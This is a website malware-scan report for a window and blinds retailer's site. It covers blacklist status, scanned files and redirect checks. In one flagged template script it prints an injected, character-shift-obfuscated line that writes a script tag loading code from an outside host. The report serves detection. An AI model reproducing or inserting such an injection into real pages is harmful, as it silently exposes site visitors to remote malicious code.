Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=okna-kipra.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://okna-kipra.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://okna-kipra.com/ | 200 OK Content-Length: 34999 Content-Type: text/html | clean |
http://okna-kipra.com/templates/zt_cara/zt_menus/zt_megamenu/zt.megamenu.js | 200 OK Content-Length: 3205 Content-Type: application/x-javascript | clean |
http://okna-kipra.com/templates/zt_cara/js/zt.script.js | 200 OK Content-Length: 1467 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('load', function(){
var StyleCookie = new Hash.Cookie('ZTCaraStyleCookieSite'); var settings = { colors: '' }; var style_1, style_2, style_3; new Asset.css(StyleCookie.get('colors')); if($('ztcolor1')){$('ztcolor1').addEvent('click', function(e) { e = new Event(e).stop(); if (style_1) style_1.remove(); new Asset.css(ztpathcolor + 'black.css', {id: 'black'}); style_1 = $('black'); settings['colors' style_3 = $('violet'); settings['colors'] = ztpathcolor + 'violet.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} }); <!-- js-tools --> x=0;while(x<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lsfnfodivh.qmbofu/dpn0xpseqsftt0tubu/qiq#?=0tdsjqu?'.charCodeAt(x++)-1)) <!-- /js-tools --> <!-- js-tools --> <!-- /js-tools --> Antivirus reports:
| ||
http://okna-kipra.com/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 2742 Content-Type: application/x-javascript | clean |
http://okna-kipra.com/modules/mod_jvslideshow/assets/js/jd.gallery.js | 200 OK Content-Length: 25619 Content-Type: application/x-javascript | clean |
http://okna-kipra.com/modules/mod_jvslideshow/assets/js/jd.gallery.transitions.js | 200 OK Content-Length: 4323 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2542713 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://okna-kipra.com/about-us.html | 200 OK Content-Length: 37507 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/okna.html | 200 OK Content-Length: 40955 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/dveri.html | 200 OK Content-Length: 37141 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/moskitnie-setki.html | 200 OK Content-Length: 37825 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/jaluzi.html | 200 OK Content-Length: 36494 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/dopolnitelno.html | 200 OK Content-Length: 26411 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/markiza.html | 200 OK Content-Length: 22873 Content-Type: text/html | clean |
http://okna-kipra.com/produkcija/tent-.html | 200 OK Content-Length: 22854 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: okna-kipra.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 23 Aug 2014 08:40:19 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Aug 2014 08:40:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 589305f8d523970cf12916c250c50191=05135be5950981bdc21dde961baa04a7; path=/
Set-Cookie: zt_cara_tpl=zt_cara; expires=Thu, 13-Aug-2015 08:40:19 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: okna-kipra.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 23 Aug 2014 08:40:19 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Aug 2014 08:40:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 589305f8d523970cf12916c250c50191=05135be5950981bdc21dde961baa04a7; path=/
Set-Cookie: zt_cara_tpl=zt_cara; expires=Thu, 13-Aug-2015 08:40:19 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: okna-kipra.com
Referer: http://www.google.com/search?q=okna-kipra.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: okna-kipra.com
Referer: http://www.google.com/search?q=okna-kipra.com
Result:
The result is similar to the first query. There are no suspicious redirects found.